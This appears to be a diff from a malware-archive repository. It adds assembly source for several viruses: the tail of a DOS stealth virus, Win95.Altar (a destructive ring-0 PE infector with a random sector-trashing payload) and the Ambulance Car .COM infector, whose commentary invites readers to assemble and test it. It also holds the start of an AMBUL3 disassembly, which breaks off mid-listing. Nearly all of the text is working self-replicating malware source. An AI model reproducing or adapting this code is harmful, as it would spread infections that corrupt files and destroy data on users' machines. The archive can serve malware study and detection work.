+exitkeepflags: retf 2 +adjustread: add ax, bp + adc dx, 0 + jnz bigread + sub bp, ax +bigread: push bp + call near ptr restoreregs + pop cx + int 21h + pushf + push ax + jb exitstealthread + push ds + pop es + mov di, dx + push cs + pop ds + mov si, offset header + cmp oldposhi, 0 + jnz exitstealthread + mov ax, oldposlo + cmp ax, 18h + jnb exitstealthread + add si, ax + add cx, ax + cmp cx, 18h + jbe moveit + sub ax, 18h + neg ax + xchg ax, cx +moveit: cld + rep movsb +exitstealthread:call restoreregsandsetvirusactive + pop ax +popf_exitwithflags: + popf + jmp exitkeepflags +gettimestealth: cmp byte ptr cs:stealthmode, 12h + jnz dotimestealth + cmp al, 0 + jz ret2 +setfullstealth: mov byte ptr cs:stealthmode, 14h + ret +dotimestealth: cmp al, 0 + jnz settimestealth + inc sp + inc sp + int 21h + pushf + jb setvirusactive_exit1 + call removemarkerfromdh +setvirusactive_exit1: + call setvirusactive + jmp popf_exitwithflags +settimestealth: call setfullstealth + mov ax, 5700h + int 21h + jb ret2 + pop ax + cmp dh, 0C8h + call near ptr restoreregs + jb removemarkeranddoint21 + cmp dh, 0C8h + jnb doint21andexit + add dh, 0C8h +doint21andexit: int 21h + pushf + jmp setvirusactive_exit1 +removemarkeranddoint21: + call removemarkerfromdh + jmp doint21andexit +removemarkerfromdh: + cmp dh, 0C8h + jb notmarked + sub dh, 0C8h +notmarked: ret +sethandletozero:mov cs:handle, 0 +ret2: ret +; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fh +functions db 013h ; 4Ch - prog terminate + db 017h ; 48h - create mem block + db 016h ; 49h - release memory + db 015h ; 4Ah - resize mem block + db 00Dh ; 52h - get SYSVARS + db 0B5h ; 0EAh - ALLOC HUGE SEG + db 06Dh ; 32h - GET DPB + db 014h ; 4Bh - program EXEC + db 062h ; 3Dh - open file + db 04Eh ; 11h - fcb FindFirst + db 04Dh ; 12h - fcb FindNext + db 011h ; 4Eh - ASCII FindFirst + db 010h ; 4Fh - ASCII FindNext + db 008h ; 57h - get/set file time + db 033h ; 6Ch - extended open + db 01Ch ; 43h - get/set attribs + db 061h ; 3Eh - handle close + db 01Fh ; 40h - handle write + db 01Dh ; 42h - lseek + db 060h ; 3Fh - handle read +functionoffsets dw offset setnofilestealth + dw offset memstealth + dw offset memstealth + dw offset memstealth + dw offset hideourmem + dw offset modifytomseginpsp + dw offset setnodirstealth + dw offset execute + dw offset infectdx + dw offset fcbdirstealth + dw offset fcbdirstealth + dw offset asciidirstealth + dw offset asciidirstealth + dw offset gettimestealth + dw offset infectsi + dw offset infectdx + dw offset sethandletozero + dw offset disinfecthandle + dw offset blocklseek + dw offset stealthread + +header db 0CDh,020h,090h +tempdta db 3Ch dup (0) +buffer db 80h dup (0) +handle db 0 +virussize = 7D0h + end virus_start diff --git a/MSDOS/Virus.MSDOS.Unknown.altar.asm b/MSDOS/Virus.MSDOS.Unknown.altar.asm new file mode 100644 index 00000000..5c2c5ec4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.altar.asm @@ -0,0 +1,534 @@ +;============================================================================ +; +; +; NAME: Win95.Altar 1.01 +; OS: Windoze 95/98. +; TYPE: Parasitic resident (VxD) PE-infector. +; SIZE: Around 800 bytes. +; AUTHOR: T-2000 / Immortal Riot. +; E-MAIL: T2000_@hotmail.com +; DATE: June 1999. +; DESTRUCTIVE: Yeah. +; +; FEATURES: +; +; - Gains ring-0 by hacking an IDT-gate. +; - Hosts don't increase in size. +; - Payload: random sector-trashing. +; +; Here's some simple ring-0 VxD-virus, just to try-out the idea. The trash- +; chance was set rather high, just to fuck beginners :P +; +;============================================================================ + + + .386p + .MODEL FLAT + .CODE + + ORG 0 + +EXTRN ExitProcess:PROC + +IFSMgr EQU 0040h +GetHeap EQU 000Dh +UniToBCSPath EQU 0041h +InstallFileSystemAPIhook EQU 0067h +Ring0_FileIO EQU 0032h +IFSFN_OPEN EQU 36 +R0_WRITEFILE EQU 0D601h + +Virus_Size EQU (Virus_End-START) +Virus_Size_Mem EQU (End_Virus_Mem-START) + + +START: + PUSH (1000h+(Carrier-START)) +Host_EIP = DWORD PTR $-4 + + PUSHFD + PUSHAD + + CALL Get_Delta + + MOV EAX, EBP + + SUB EAX, 1000h ; Calculate base-address. +Virus_RVA = DWORD PTR $-4 + + ADD [ESP+(9*4)], EAX ; Add base to the EIP RVA. + + XOR EAX, EAX + + CALL Setup_SEH ; Bail-out without errors + ; under NT. + MOV ESP, [ESP+(2*4)] + + JMP Return_Host + +Setup_SEH: PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + PUSH EAX ; Store IDT in EAX. + SIDT [ESP-2] + POP EAX + + LEA EBX, [EBP+(Ring0_Installation-START)] + + XCHG [EAX+(3*8)], BX ; Hack IDT-gate. + ROR EBX, 16 + XCHG [EAX+(3*8)+6], BX + + INT 3 + + MOV [EAX+(3*8)+6], BX ; Restore IDT-gate. + ROL EBX, 16 + MOV [EAX+(3*8)], BX + +Return_Host: XOR EAX, EAX ; Restore the original SEH. + + POP DWORD PTR FS:[EAX] + POP EAX + + POPAD + POPFD + + RET ; RETurn to our host. + + +Copyright DB '[Altar] by T-2000 / Immortal Riot', 0 + + +VxD_Ring0_FileIO: + + INT 20h + DW Ring0_FileIO + DW IFSMgr + + RET + + +Ring0_Installation: + + PUSHFD + PUSHAD + + MOV EAX, DR2 ; Get DR2 in EAX. + + CMP AL, 'T' ; We're already resident? + JE Exit_R0_Inst + + LEA EDI, [EBP+(VxD_Ring0_FileIO-START)] + + MOV AX, 20CDh + STOSW + + MOV [EDI], 00400032h + + MOV [EDI+(VxD_Call_1-VxD_Ring0_FileIO)-2], AX + MOV [EDI+(VxD_Call_2-VxD_Ring0_FileIO)-2], AX + MOV [EDI+(VxD_Call_3-VxD_Ring0_FileIO)-2], AX + + MOV [EDI+(VxD_Call_1-VxD_Ring0_FileIO)], 0040000Dh + MOV [EDI+(VxD_Call_2-VxD_Ring0_FileIO)], 00400067h + MOV [EDI+(VxD_Call_3-VxD_Ring0_FileIO)], 00400041h + + PUSH Virus_Size_Mem ; Allocate memory from the + INT 20h ; global heap. + DW GetHeap + DW IFSMgr +VxD_Call_1 = $-6 + POP ECX + + OR EAX, EAX ; Error occurred? + JZ Exit_R0_Inst + + MOV ESI, EBP ; Copy us to VxD-memory. + MOV EDI, EAX + CLD + REP MOVSB + + MOV [EAX+(Busy_Switch-START)], ECX + + ADD EAX, (Ring0_Hook-START) + + PUSH EAX ; Insert our file-hook. + INT 20h + DW InstallFileSystemAPIhook + DW IFSMgr +VxD_Call_2 = $-6 + POP EBX + + XCHG ECX, EAX ; Error? + JECXZ Exit_R0_Inst + + MOV [EBX+(Prev_Handler-Ring0_Hook)], ECX + + MOV AL, 'T' ; Mark us as resident. + MOV DR2, EAX + +Exit_R0_Inst: POPAD + POPFD + + IRETD ; Back to our ring-3 part. + + +Ring0_Hook: + JMP $+666h +Busy_Switch = DWORD PTR $-4 + + PUSHFD + PUSHAD + + CALL Get_Delta + + MOV DWORD PTR [EBP+(Busy_Switch-START)], (JMP_Prev_Hook-Busy_Switch) - 4 + + CMP DWORD PTR [ESP+(9*4)+(2*4)], IFSFN_OPEN + JNE Exit_Infect + + CALL Get_Random + + CMP DL, 5 + JA Obtain_Name + + CALL Get_Random + + MOV AX, 0DE02h ; R0_WRITEABSOLUTEDISK + INC ECX + LEA ESI, [EBP+(Copyright-START)] + CALL VxD_Ring0_FileIO + +Obtain_Name: MOV EBX, [ESP+(9*4)+(6*4)] ; IOREQ-structure. + + MOV ESI, [EBX+(3*4)] ; Unicode-path. + + CLD + LODSD + + PUSH DWORD PTR [ESP+(9*4)+(5*4)] + PUSH 259 + PUSH ESI + LEA ESI, [EBP+(ANSI_Target-START)] + PUSH ESI + INT 20h + DW UniToBCSPath + DW IFSMgr +VxD_Call_3 = $-6 + + ADD ESP, (4*4) ; Fix stack. + + OR EDX, EDX ; No problems during the + JNZ Exit_Infect ; conversion? + + MOV [ESI+EAX], DL + + CMP [ESI+EAX-4], 'EXE.' ; Standard .EXE-file? + JNE Exit_Infect + + XOR EAX, EAX ; R0_OPENCREATFILE + MOV AH, 0D5h + PUSH 02h + POP EBX + INC EDX + CALL VxD_Ring0_FileIO + JC Exit_Infect + + XCHG EBX, EAX ; Save filehandle in EBX. + + XOR EAX, EAX ; R0_GETFILESIZE + MOV AH, 0D8h + CALL VxD_Ring0_FileIO + + CMP EAX, 4096 ; Avoid infecting files which +JC_Close_File: JB Close_File ; are too small. + + MOV [EBP+(Victim_Size-START)], EAX + + LEA EDI, [EBP+(Header-START)] + + ; Read-in the DOS MZ-header. + + XOR EAX, EAX ; R0_READFILE + MOV AH, 0D6h + PUSH 40h + POP ECX + XOR EDX, EDX + MOV ESI, EDI + CALL VxD_Ring0_FileIO + JC JC_Close_File + + CMP [EDI.MZ_Mark], 'ZM' ; It's a valid .EXE-file? + JNE Close_File + + MOV EDX, [EDI+3Ch] ; Pointer to PE-header. + + MOV [EBP+(PE_Header_Offs-START)], EDX + + ; Read-in PE-header. + + XOR EAX, EAX ; R0_READFILE + MOV AH, 0D6h + PUSH 92 + POP ECX + CALL VxD_Ring0_FileIO + + CMP [EDI.PE_Mark], 'EP' ; Verify the PE-header. + JNE Close_File + + CMP [EDI.PE_Checksum], -666h ; Avoid infected + JE Close_File ; files. + + MOVZX EAX, [EDI.Object_Count] + DEC EAX + PUSH 40 + POP ECX + MUL ECX + + MOVZX DX, [EDI.NT_Header_Size] + + LEA EDX, [EDX+24+EAX] + + ADD EDX, [EBP+(PE_Header_Offs-START)] + + MOV [EBP+(Last_Obj_Offset-START)], EDX + + ; Read-in the last object-header. + + XOR EAX, EAX ; R0_READFILE + MOV AH, 0D6h + PUSH 40 + POP ECX + LEA ESI, [EBP+(Last_Obj_Table-START)] + CALL VxD_Ring0_FileIO + + MOV EAX, [ESI.Section_Physical_Size] + + CMP EAX, [ESI.Section_Virtual_Size] + JBE Check_Size + + MOV EAX, [ESI.Section_Virtual_Size] + +Check_Size: PUSH EAX + + MOV ECX, Virus_Size + + ADD EAX, ECX + ADD EAX, [ESI.Section_Physical_Offset] + + CMP EAX, 12345678h ; File increases in size? +Victim_Size = DWORD PTR $-4 + + POP EAX + + JA Close_File ; Then abort the infect. + + PUSH EAX + + PUSH EAX + + ADD EAX, ECX + + PUSH EAX + + MOV ECX, [EDI.File_Align] + CALL Align_EAX + + CMP [ESI.Section_Physical_Size], EAX + JNB Calc_New_Virt + + MOV [ESI.Section_Physical_Size], EAX + +Calc_New_Virt: POP EAX + MOV ECX, [EDI.Object_Align] + CALL Align_EAX + + CMP [ESI.Section_Virtual_Size], EAX + JNB Set_New_EIP + + ADD [EDI.Image_Size], EAX + + XCHG [ESI.Section_Virtual_Size], EAX + + SUB [EDI.Image_Size], EAX + +Set_New_EIP: POP EAX + + ADD EAX, [ESI.Section_RVA] + + MOV [EBP+(Virus_RVA-START)], EAX + + XCHG [EDI.EIP_RVA], EAX + + MOV [EBP+(Host_EIP-START)], EAX + + ; Write updated object-header back to disk. + + MOV EAX, R0_WRITEFILE + PUSH 40 + POP ECX + MOV EDX, 12345678h +Last_Obj_Offset = DWORD PTR $-4 + CALL VxD_Ring0_FileIO + + POP EDX + + ; Insert virus-body into our victim. + + MOV EAX, R0_WRITEFILE + MOV ECX, Virus_Size + ADD EDX, [ESI.Section_Physical_Offset] + MOV ESI, EBP + CALL VxD_Ring0_FileIO + + ; Mark file as infected. + + MOV [EDI.PE_Checksum], -666h + + ; Write updated PE-header back to disk. + + MOV EAX, R0_WRITEFILE + PUSH 92 + POP ECX + MOV EDX, 12345678h +PE_Header_Offs = DWORD PTR $-4 + MOV ESI, EDI + CALL VxD_Ring0_FileIO + + ; Close the file. + +Close_File: XOR EAX, EAX ; R0_CLOSEFILE + MOV AH, 0D7h + CALL VxD_Ring0_FileIO + +Exit_Infect: XOR EAX, EAX ; Reset busy-flag. + + MOV [EBP+(Busy_Switch-START)], EAX + + POPAD + POPFD + +JMP_Prev_Hook: JMP DS:[12345678h] +Prev_Handler = DWORD PTR $-4 + + + DB 'Awaiting the sacrifice...', 0 + + +Align_EAX: + XOR EDX, EDX + DIV ECX + + OR EDX, EDX + JZ Calc_Aligned + + INC EAX + +Calc_Aligned: MUL ECX + + RET + + +Get_Delta: + CALL Get_EIP +Get_EIP: POP EBP + SUB EBP, (Get_EIP-START) + + RET + + +Get_Random: + IN EAX, 40h + ADD EDX, EAX + +Randomize: IN EAX, 40h + XCHG AH, AL + + ADD EAX, 0DEADBEEFh + + RCL EDX, 3 + + XOR EDX, EAX + + LOOP Randomize + + RET + +Virus_End: + +ANSI_Target DB 260 DUP(0) + +Header DB 92 DUP(0) + +Last_Obj_Table DB 40 DUP(0) + +End_Virus_Mem: + + +Carrier: + PUSH 0 + CALL ExitProcess + + + + +; The good old MZ-header... + +MZ_Header STRUC +MZ_Mark DW 0 +MZ_Image_Mod_512 DW 0 +MZ_Image_512_Pages DW 0 +MZ_Reloc_Items DW 0 +MZ_Header_Size_Mem DW 0 +MZ_Min_Size_Mem DW 0 +MZ_Max_Size_Mem DW 0 +MZ_Program_SS DW 0 +MZ_Program_SP DW 0 +MZ_Checksum DW 0 +MZ_Program_IP DW 0 +MZ_Program_CS DW 0 +MZ_Reloc_Table DW 0 +MZ_Header ENDS + + +PE_Header STRUC +PE_Mark DD 0 ; PE-marker (PE/0/0). +CPU_Type DW 0 ; Minimal CPU required. +Object_Count DW 0 ; Number of sections in PE. + DD 0 +Reserved_1 DD 0 + DD 0 +NT_Header_Size DW 0 +PE_Flags DW 0 + DD 4 DUP(0) +EIP_RVA DD 0 + DD 2 DUP(0) +Image_Base DD 0 +Object_Align DD 0 +File_Align DD 0 + DW 0, 0 + DW 0, 0 + DW 0, 0 +PE_Reserved_5 DD 0 +Image_Size DD 0 +Headers_Size DD 0 +PE_Checksum DD 0 + DW 0 +DLL_Flags DW 0 +PE_Header ENDS + + +Section_Header STRUC +Section_Name DB 8 DUP(0) ; Zero-padded section-name. +Section_Virtual_Size DD 0 ; Memory-size of section. +Section_RVA DD 0 ; Start section in memory. +Section_Physical_Size DD 0 ; Section-size in file. +Section_Physical_Offset DD 0 ; Section file-offset. +Section_Reserved_1 DD 0 ; Not used for executables. +Section_Reserved_2 DD 0 ; Not used for executables. +Section_Reserved_3 DD 0 ; Not used for executables. +Section_Flags DD 0 ; Flags of the section. +Section_Header ENDS + + + END START diff --git a/MSDOS/Virus.MSDOS.Unknown.ambul.asm b/MSDOS/Virus.MSDOS.Unknown.ambul.asm new file mode 100644 index 00000000..eee57f0b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ambul.asm @@ -0,0 +1,523 @@ +;REDCROSS/AMBULANCE CAR VIRUS for Crypt Newsletter #10, edited by Urnst Kouch +;December 1992 +;Originally supplied as a Sourcer disassembly in a Scandinavian virus mag +;published by "Youth Against McAfee (YAM)", this AMBULANCE specimen was +;generated in its raw form by "Natas Kaupas." Hold that up to your mirror +;and it spells Satan. Whatever, "Natas/Satan" has also supplied us with the +;MINDLESS/FamR series of viruses for you trivia buffs. The Crypt Newsletter +;is obliged to him, wherever he is, for these interesting programs. +; +;In any case, while helpful, the original disassembly had diminished +;value, being completely uncommented. It did, however, assemble +;under TASM into an actual working copy of the virus, which +;appears to be the AMBULANCE CAR B strain. +; +; +;Ambulance Car remains an interesting virus, packed with enough features +;so that it can still find its target files, .COM executables, wherever +;they might be lurking on a system. +; +;Principally, this revolves around the virus searching the path string set +;in the environment. If no path exists, the virus defaults to the +;current directory. In both cases, the virus may infect up to two files +;anywhere on the path per pass. Most times it will infect only one. +;Sometimes it will not budge at all. +; +;Once it's found a file, Ambulance checks it for the 0E9h byte at +;the beginning. If it doesn't find it, the virus assumes the file is +;uninfected and immediately tries to complete the infection. If +;it does find the byte, it continues reading from there to confirm +;the viral sequence. If this is a coincidence and the complete sequence +;is not there, the virus will infect the file anyway. +; +;Randomly, the virus will activate and run the Ambulance across the bottom +;of your screen after a round of infection. Because of the path search +;Ambulance can easily find .COM executables on a sizeable disk at a time +;when there are less and less of these to be seen. Unfortunately, for a +;direct-action virus, the disk activity is noticeable with the caveats: +;on a fast machine, perhaps not; or in front of an average user, perhaps not. +;You never know how a user will react when dealing with viruses. +; +;You can easily experiment with this version on your machine by commenting +;out the path statement in your AUTOEXEC.BAT. This will restrict the +;virus to a test directory where it can be used to infect bait files +;until the Ambulance effect is seen. +; +;Ambulance Car is detected by "rules-based" anti-virus sentries like +;PCRx (reviewed in this issue), but keep in mind this type of +;protection is not flawless. Accidents can happen. Most current scanners +;easily detect this variant of Ambulance, although +;some cannot disinfect files once they are parasitized. + +data_1e equ 0Ch +data_2e equ 49h +data_3e equ 6Ch +psp_envirn_seg equ 2Ch +data_21e equ 0C80h + +virus segment byte public + assume cs:virus, ds:virus + + + org 100h + +redcross proc far ;main flow control procedure for Ambulance + ;Car virus +start: + jmp short virstart +data_5 dw 4890h ; Data table +data_7 dw 6C65h ; Data table + db 6Ch, 6Fh, 20h, 2Dh, 20h + +copyright db 'Copyright S & S Enterprises, 198';whoah, how'd Solomon's + db '8' ;stamp get in here? ;-] + db 0Ah, 0Dh, 24h, 1Ah,0B4h, 09h + db 0BAh, 03h, 01h,0CDh, 21h,0CDh + db 20h +virstart: + db 0E8h, 01h, 00h + add [bp-7Fh],bx + out dx,al ; port 0, channel 0 + add ax,[bx+di] + call check_infect ; do path search, infect file + call check_infect ; ditto, sometimes, sometimes not + call sound_fury ; do we do AMBULANCE effect? Check! + lea bx,[si+419h] + mov di,100h + mov al,[bx] + mov [di],al + mov ax,[bx+1] + mov [di+1],ax + jmp di ; Register jump + +exit: + retn ; handoff to host + +redcross endp + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +check_infect proc near ; path search for Ambulance + call loadpath ; Car + mov al,byte ptr data_19[si] + or al,al + jz exit ; No path/no files? Git! + lea bx,[si+40Fh] + inc word ptr [bx] + lea dx,[si+428h] ; load effective address + mov ax,3D02h + int 21h ; open found file by loadpath read/write + ; with handle + mov word ptr ds:[417h][si],ax ;ax contains handle + mov bx,word ptr ds:[417h][si] + mov cx,3 + lea dx,[si+414h] ; load address of buffer + mov ah,3Fh ; to read first three bytes into. + int 21h ; Read the bytes . . . + ; bx points to file handle. + ; + mov al,byte ptr ds:[414h][si] + cmp al,0E9h ; compare with 0E9h + jne infect ; if not equal, assume virus not here - infect + mov dx,word ptr ds:[415h][si] + mov bx,word ptr ds:[417h][si] + add dx,3 + xor cx,cx ; zero register + mov ax,4200h + int 21h ; point to beginning of file, again + ; bx contains the handle + + mov bx,word ptr ds:[417h][si] + mov cx,6 + lea dx,[si+41Ch] ; load effective address + mov ah,3Fh ; and read the first 6 bytes + int 21h ; this time + + ; ds:dx points to buffer + mov ax,data_13[si] + mov bx,data_14[si] + mov cx,data_15[si] + cmp ax,word ptr ds:[100h][si] ; compare with data copied above + jne infect ; jump if not equal to infect + cmp bx,data_5[si] + jne infect ; jump if not equal + cmp cx,data_7[si] + je close ; finally, if we get a match we know +infect: ; we're here, so go to close up + mov bx,word ptr ds:[417h][si] + xor cx,cx ; zero register + xor dx,dx ; zero register + mov ax,4202h + int 21h ; reset pointer to end of file + ; bx contains file handle + + sub ax,3 + mov word ptr ds:[412h][si],ax + mov bx,word ptr ds:[417h][si] + mov ax,5700h ; bx points to name of file + int 21h ; get file date and time + ; time returns in cx, date in dx + + push cx ; push these onto the stack + push dx ; we'll need 'em later + mov bx,word ptr ds:[417h][si] + mov cx,319h + lea dx,[si+100h] + mov ah,40h ; write the virus to the end of + int 21h ; the file, identified in bx + ; cx contains virus length for write + ; so do it, yes, append virus + mov bx,word ptr ds:[417h][si] + mov cx,3 + lea dx,[si+414h] ; load effective address + mov ah,40h ; + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov bx,word ptr ds:[417h][si] + xor cx,cx ; zero register + xor dx,dx ; zero register + mov ax,4200h + int 21h ; reset the pointer to start of file + ; identified in bx + ; cx,dx=offset + mov bx,word ptr ds:[417h][si] + mov cx,3 + lea dx,[si+411h] ; load effective address + mov ah,40h ; and write the first three virus id + int 21h ; and jump bytes to the file + ; now, just about finished + + pop dx ; retrieve date + pop cx ; and time from stack + mov bx,word ptr ds:[417h][si] + mov ax,5701h ; restore file's date/time + int 21h + +close: + mov bx,word ptr ds:[417h][si] + mov ah,3Eh + int 21h ; close file + + retn ; return to caller, maybe we'll +check_infect endp ; infect again, maybe not + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +loadpath proc near ; this procedure checks for the + mov ax,ds:psp_envirn_seg ; existence of the ASCII path string in the + mov es,ax ; environment block of the program + push ds ; segment prefix (in this case psp_envirn_seg) + mov ax,40h ; if it exists, Ambulance Car copies + mov ds,ax ; the entire string into a buffer by using + mov bp,ds:data_3e ; '/' and ';' as cues. The virus then + pop ds ; sets the DTA to a directory + test bp,3 ; found in the path and executes a simple + jz loc_8 ; file search. If unproductive, it + xor bx,bx ; recursively searches the path +loc_6: ; before defaulting to the current + mov ax,es:[bx] ; directory + cmp ax,4150h + jne loc_7 + cmp word ptr es:[bx+2],4854h + je loc_9 +loc_7: + inc bx + or ax,ax + jnz loc_6 ; jump if not zero +loc_8: + lea di,[si+428h] + jmp short loc_14 +loc_9: + add bx,5 +loc_10: + lea di,[si+428h] ; load effective address of buffer +loc_11: + mov al,es:[bx] + inc bx ; copy a byte from the path + or al,al + jz loc_13 ; jump if zero + cmp al,3Bh ; found a divider? ';' + je loc_12 ; jump if equal, continue copying path + mov [di],al + inc di + jmp short loc_11 ; loop around, continue copying +loc_12: + cmp byte ptr es:[bx],0 + je loc_13 + shr bp,1 ; Shift w/zeros fill + shr bp,1 ; Shift w/zeros fill + test bp,3 + jnz loc_10 ; Jump if not zero +loc_13: + cmp byte ptr [di-1],5Ch ; compare with '\' + je loc_14 ; jump if equal + mov byte ptr [di],5Ch ; compare with '\' + inc di +loc_14: + push ds + pop es + mov data_16[si],di + mov ax,2E2Ah + stosw ; copy portion of path, store ax to es:[di] + mov ax,4F43h + stosw ; Store ax to es:[di] + mov ax,4Dh + stosw ; Store ax to es:[di] + push es + mov ah,2Fh + int 21h ; get current DTA + ; move it into es:bx + mov ax,es + mov data_17[si],ax + mov data_18[si],bx + pop es + lea dx,[si+478h] ; address of filemask + mov ah,1Ah + int 21h ; set the DTA to first dir in path + ; disk xfer area, ds:dx + lea dx,[si+428h] ; load effective address + xor cx,cx ; zero register + mov ah,4Eh ; find first file + int 21h + + jnc loc_15 ; jump if carry = 0 + xor ax,ax + mov data_19[si],ax + jmp short loc_18 +loc_15: + push ds + mov ax,40h + mov ds,ax + ror bp,1 + xor bp,ds:data_3e + pop ds + test bp,7 + jz loc_16 ; Jump if zero + mov ah,4Fh + int 21h + ; find next file + jnc loc_15 ; jump if carry = 0 +loc_16: + mov di,data_16[si] + lea bx,[si+496h] +loc_17: + mov al,[bx] + inc bx + stosb ; Store al to es:[di] + or al,al + jnz loc_17 ; Jump if not zero +loc_18: + mov bx,data_18[si] + mov ax,data_17[si] + push ds + mov ds,ax + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area), ds:dx + pop ds + retn ; return to check_infect +loadpath endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sound_fury proc near ;sets up Ambulance Car effect, but + push es ; other than that, I have no idea + mov ax,word ptr ds:[40Fh][si] ; subroutines and procs from + and ax,7 ; here on down manage the + cmp ax,6 ; Ambulance Car graphic and + jne loc_19 ; siren effect + mov ax,40h + mov es,ax + mov ax,es:data_1e + or ax,ax + jnz loc_19 ; <= comment this out and you'll + inc word ptr es:data_1e ; get a corrupted version of the + call sub_5 ; Car effect everytime the virus +loc_19: ; executes. If you fiddle around + pop es ; with it enough you'll eventually + retn ; get the strain known as RedX-Any, +sound_fury endp ; for RedCross anytime. + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_5 proc near + push ds + mov di,0B800h + mov ax,40h + mov ds,ax + mov al,ds:data_2e + cmp al,7 + jne loc_20 + mov di,0B000h +loc_20: + mov es,di + pop ds + mov bp,0FFF0h +loc_21: + mov dx,0 + mov cx,10h + +locloop_22: + call sub_8 + inc dx + loop locloop_22 ; Loop if cx > 0 + + call sub_7 + call sub_9 + inc bp + cmp bp,50h + jne loc_21 ; Jump if not equal + call sub_6 + push ds + pop es + retn +sub_5 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_6 proc near ; cycles speaker on for siren + in al,61h ; port 61h, 8255 port B, read + and al,0FCh + out 61h,al ; port 61h, 8255 B - spkr, etc + ; al = 0, disable parity + retn +sub_6 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_7 proc near ; more speaker stuff + mov dx,7D0h + test bp,4 + jz loc_23 + mov dx,0BB8h +loc_23: + in al,61h ; port 61h, 8255 port B, read + test al,3 + jnz loc_24 + or al,3 + out 61h,al ; port 61h, 8255 B - spkr, etc + mov al,0B6h + out 43h,al ; port 43h, 8253 wrt timr mode +loc_24: + mov ax,dx + out 42h,al ; port 42h, 8253 timer 2 spkr + mov al,ah + out 42h,al ; port 42h, 8253 timer 2 spkr + retn +sub_7 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_8 proc near + push cx + push dx + lea bx,[si+3BFh] ; Load effective addr + add bx,dx + add dx,bp + or dx,dx ; Zero ? + js loc_27 ; Jump if sign=1 + cmp dx,50h + jae loc_27 ; Jump if above or = + mov di,data_21e + add di,dx + add di,dx + sub dx,bp + mov cx,5 + +locloop_25: + mov ah,7 + mov al,[bx] + sub al,7 + add al,cl + sub al,dl + cmp cx,5 + jne loc_26 ; Jump if not equal + mov ah,0Fh + test bp,3 + jz loc_26 ; Jump if zero + mov al,20h ; ' ' +loc_26: + stosw ; Store ax to es:[di] + add bx,10h + add di,9Eh + loop locloop_25 ; Loop if cx > 0 + +loc_27: + pop dx + pop cx + retn +sub_8 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_9 proc near + push ds + mov ax,40h + mov ds,ax + mov ax,ds:data_3e +loc_29: + cmp ax,ds:data_3e + je loc_29 ; Jump if equal + pop ds + retn +sub_9 endp + + db 22h, 23h, 24h, 25h + db 26h, 27h, 28h, 29h, 66h, 87h + db 3Bh, 2Dh, 2Eh, 2Fh, 30h, 31h + db 23h,0E0h,0E1h,0E2h,0E3h,0E4h + db 0E5h +data_8 dw 0E7E6h ; Data table (indexed access) + db 0E7h +data_9 dw 0EAE9h ; Data table (indexed access) +data_10 db 0EBh ; Data table (indexed access) +data_11 dw 3130h ; Data table (indexed access) +data_12 dw 2432h ; Data table (indexed access) + db 0E0h,0E1h,0E2h +data_13 dw 0E8E3h ; Data table (indexed access) +data_14 dw 0EA2Ah ; Data table (indexed access) +data_15 dw 0E8E7h ; Data table (indexed access) +data_16 dw 2FE9h ; Data table (indexed access) +data_17 dw 6D30h ; Data table (indexed access) +data_18 dw 3332h ; Data table (indexed access) +data_19 dw 0E125h ; Data table (indexed access) + db 0E2h,0E3h,0E4h,0E5h,0E7h,0E7h + db 0E8h,0E9h,0EAh,0EBh,0ECh,0EDh + db 0EEh,0EFh, 26h,0E6h,0E7h, 29h + db 59h, 5Ah, 2Ch,0ECh,0EDh,0EEh + db 0EFh,0F0h, 32h, 62h, 34h,0F4h + db 09h, 00h,0E9h, 36h, 00h,0EBh + db 2Eh, 90h, 05h, 00h,0EBh, 2Eh + db 90h + +virus ends + + + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.ambul3.asm b/MSDOS/Virus.MSDOS.Unknown.ambul3.asm new file mode 100644 index 00000000..ba4566c4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ambul3.asm @@ -0,0 +1,390 @@ +;NAME: AMBUL3.C-M +;FILE SIZE: 00330h - 816d +;START (CS:IP): 00100h +;CODE END: 00430h +;CODE ORIGIN: 00100h +;DATE: Sun Aug 16 15:45:06 1992 + +CODE SEGMENT BYTE PUBLIC 'CODE' +ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING + +P00100 PROC + ORG 0100h + +H00100: JMP H00114 ;00100 E91100 ___ +;Will be overwritten with B4 09 BA-- MOV AH,09 and MOV DX +;--------------------------------------------------- + OR [BX+DI],AX ;00103 0901 __ +;DX gets this, location of string. + INT 21h ;Indef_INT:21h-AH ;00105 CD21 _! + INT 20h ;B-TERM_norm:20h ;00107 CD20 _ +;--------------------------------------------------- + DB "Infect me!$" ;00109 496E6665637420 +;--------------------------------------------------- +H00114: CALL H00118 ; . . . . . . . . . ;00114 E80100 ___ + ADD [BP-7Fh],BX ;00117 015E81 _^_ + OUT DX,AL ;Port_OUT:DX ;0011A EE _ + ADD AX,[BX+DI] ;0011B 0301 __ + CALL H0013A ; . . . . . . . . . ;0011D E81A00 ___ + CALL H0013A ; . . . . . . . . . ;00120 E81700 ___ + CALL H002F8 ; . . . . . . . . . ;00123 E8D201 ___ + LEA BX,[SI+0419h] ;00126 8D9C1904 ____ + MOV DI,0100h ;0012A BF0001 ___ + MOV AL,[BX] ;0012D 8A07 __ + MOV [DI],AL ;0012F 8805 __ + MOV AX,[BX+01h] ;00131 8B4701 _G_ + MOV [DI+01h],AX ;00134 894501 _E_ + JMP DI ;00137 FFE7 __ +;--------------------------------------------------- + RET ;RET_Near ;00139 C3 _ +;--------------------------------------------------- +H0013A: CALL H0021B ; . . . . . . . . . ;0013A E8DE00 ___ + MOV AL,[SI+0428h] ;0013D 8A842804 __(_ + OR AL,AL ;00141 0AC0 __ + JZ H00139 ;00143 74F4 